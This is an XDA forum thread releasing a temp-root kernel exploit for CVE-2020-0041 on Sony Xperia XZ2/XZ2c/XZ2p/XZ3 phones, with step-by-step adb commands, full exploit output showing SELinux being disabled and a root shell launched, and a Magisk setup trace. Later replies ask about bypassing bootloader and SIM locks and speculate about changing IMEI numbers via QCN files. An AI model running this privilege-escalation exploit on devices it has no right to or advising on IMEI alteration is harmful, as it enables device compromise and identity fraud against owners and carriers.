[XZ2/XZ2c/XZ2p/XZ3] temp root exploit via CVE-2020-0041 including magisk setup

Search This thread

seyrarms

Senior Member
Glad to know that
Btw is there any possibility to unlock bootloader without s1unlock tool
And how can we boot into edl mode.
it was possible for lg v50 i think by flashing xbl partition backed up from unlocked device

Having non unlockable bootloader device is headache.
Im gonna never buy sony mobiles again😑😑
Hmmm someone ppl the last time try open unlock bootloader from backup boot.img from root device but this person get hardbrick and someday this person back again and said the device already unlock bootloader. Idk this possible or not since this person not said the detail how be can possible about that. For XBL partion someone wanna try this. But my problem is sim lock. AU provider give locked for network subset. I need know how be possible open this without s1unlocktool if do.
 

uzairale

Member
Jul 30, 2021
17
1
Hmmm someone ppl the last time try open unlock bootloader from backup boot.img from root device but this person get hardbrick and someday this person back again and said the device already unlock bootloader. Idk this possible or not since this person not said the detail how be can possible about that. For XBL partion someone wanna try this. But my problem is sim lock. AU provider give locked for network subset. I need know how be possible open this without s1unlocktool if do.
Hmm it means no chance
 

uzairale

Member
Jul 30, 2021
17
1
Hmmm someone ppl the last time try open unlock bootloader from backup boot.img from root device but this person get hardbrick and someday this person back again and said the device already unlock bootloader. Idk this possible or not since this person not said the detail how be can possible about that. For XBL partion someone wanna try this. But my problem is sim lock. AU provider give locked for network subset. I need know how be possible open this without s1unlocktool if do.
Hey buddy from last 3 days I am facing an issue
After getting temproot apps are not working even not opening
I tried flashing fresh firmware and getting temproot still same problem
Do you know how can I fix it?
 

uzairale

Member
Jul 30, 2021
17
1
Did u mean app bank?
No
I meant all normal apps
Including system apps even settings and also everything becomes unresponsive like I cant unistall apps even cant shutdown or restart the mobile I had to force restart by buttons
But luckily I have figured it out
For some unknown reasons a module is causing the problem as i had recently updated it
Will try removing that with adb but if it failed
I will need to reflash firmware
 

vhandeerzhul22

New member
Feb 12, 2016
1
0
I found this:
Port detected diag with qualcom qpst
The connection method is by ip address in the same network jaringan

Can it flash boot and unlock this sony xz2 bootloader? Here there is a flash menu with an .img extension too

I've already backed up qcn and it worked, it's also useful for buckup & restore qcn for locked imei devices from every country
Sorry it's too long, I hope someone can answer my curiosity, thank you
@j4nn and Team and friend in XDA
Can u edit the imei number in the qcn file and flash it back to the phone...? Are the imei number Can change with this metode...?
 

yosia_ryan

Member
Jan 7, 2019
18
6
21
Sony Xperia XZ2 Premium
Can u edit the imei number in the qcn file and flash it back to the phone...? Are the imei number Can change with this metode...
Can u edit the imei number in the qcn file and flash it back to the phone...? Are the imei number Can change with this metode...?
if imei allows changed even in bootloader allowed no , game ends unlock allowed to yes without paying allow in my opinion
 

yosia_ryan

Member
Jan 7, 2019
18
6
21
Sony Xperia XZ2 Premium
can you share your way how to temproot your xz2 compact docomo? I need it too.

You should join our group, it's very interesting you will get temproot xz2c there
 

Top Liked Posts

  • There are no posts matching your filters.
  • 33
    temp root exploit for sony xperia XZ2/XZ2c/XZ2p/XZ3 with android 10 firmware
    including temporal magisk setup from the exploit


    The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
    I have adapted the Pixel 3 specific exploit for kernel 4.9 that is used with sony TAMA platform phones running Android 10 with February 2020 security patch level.

    SUPPORTED TARGETS
    This has been tested only with xperia XZ2 H8216-52.1.A.0.618 target, but support for other targets have been implemented based on analysis of each kernel image from target firmware.
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

    USAGE HOWTO INCLUDING MAGISK SETUP
    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer mode options and in there adb debugging (eventually install adb drivers)
    • download the tama-mroot.zip with the exploit attached in this post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push tama-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with following commands in 'adb shell'
      Code:
      cd /data/local/tmp
      unzip tama-mroot.zip
      chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
      ./magisk-setup.sh
    • get temp root and start magisk up with following commands in 'adb shell':
      Code:
      cd /data/local/tmp
      ./tama-mroot
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3

    If it worked, you should see something like this:

    Code:
    H8216:/ $ cd /data/local/tmp
    H8216:/data/local/tmp $ ./tama-mroot                                                                                                                                                                           
    [+] Detected H8216-52.1.A.0.618 target
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffd07822fa00
    [+] file epitem at ffffffd102da6d00
    [+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
    [+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff9dee01ebf8
    [+] kernel base: ffffff9dece80000
    [+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
    [+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
    [+] init_cred: ffffff9def02fcd0
    [+] memstart_addr: 0xfffffff040000000
    [+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
    [+] Second level entry: ae419003 -> next table at ffffffd06e419000
    [+] sysctl_table_root = ffffff9def05c710
    [+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
    [+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
    [+] Injected sysctl node!
    [+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffd07822fa20
    [+] epitem.prev = ffffffd07822fad8
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                   
    + FRESH=false
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                   
    + FRESH=false
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=2
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + false
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14148
    + '[' -z 14148 ']'
    + >/sbin/.magisk/escalate
    + echo 14148
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                   
    + FRESH=false
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC=''
    + timeout=10
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14165
    + '[' -n 14165 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                     
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.9.186-perf+ #1 SMP PREEMPT Fri Jan 17 01:22:05 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                             
    Permissive


    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
    The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot image, can result with a not anymore booting phone.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions - you would need to unlock bootloader for that.
    Some partitions might still be possible to modify - for example in case of sony xperia xz1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

    Please note, this exploit will get you a root shell with still locked TAMA platform phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there. Backup of TA partition now works with tama-mroot avoiding 'Required key not available' you could experience with previously released tama-root.
    There is currently no known method though how to restore drm functionalities after bootloader unlock even after restoring TA partition from the locked state backup.
    For details please check exploiting xperia XZ2 - good and bad news post and following discussion there.

    SOURCES
    Exploit sources for all releases are available at my github here.

    CREDITS
    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

    DONATIONS
    If you like my work, you can donate using the Donate to Me button with several methods there.
    Thank you very much to all who donate.

    DOWNLOAD
    7
    implemented magisk setup from temproot

    finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip - get it here
    5
    CHANGELOG
    • 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
    • 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip
    5
    As it seems .618 fw versions get missing from xperifirm, please let me know if you need some - I still have following:
    H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C
    H8166_Customized FR_1313-2540_52.1.A.0.618_R4C
    H8216_Customized UK_1313-4679_52.1.A.0.618_R5C
    H8266_Customized FR_1313-2481_52.1.A.0.618_R4C
    H8296_Customized TW_1313-6119_52.1.A.0.618_R4C
    H8314_Customized FR_1313-2468_52.1.A.0.618_R4C
    H8324_Customized FR_1313-2469_52.1.A.0.618_R2C
    H8416_Customized IBE_1316-6423_52.1.A.0.618_R5C
    H9436_Customized FR_1316-3076_52.1.A.0.618_R6C
    H9493_Customized HK_1316-2331_52.1.A.0.532_R2C
    so I may upload it on request.
    4
    So you did it again! You are insane mate!!
    Respect.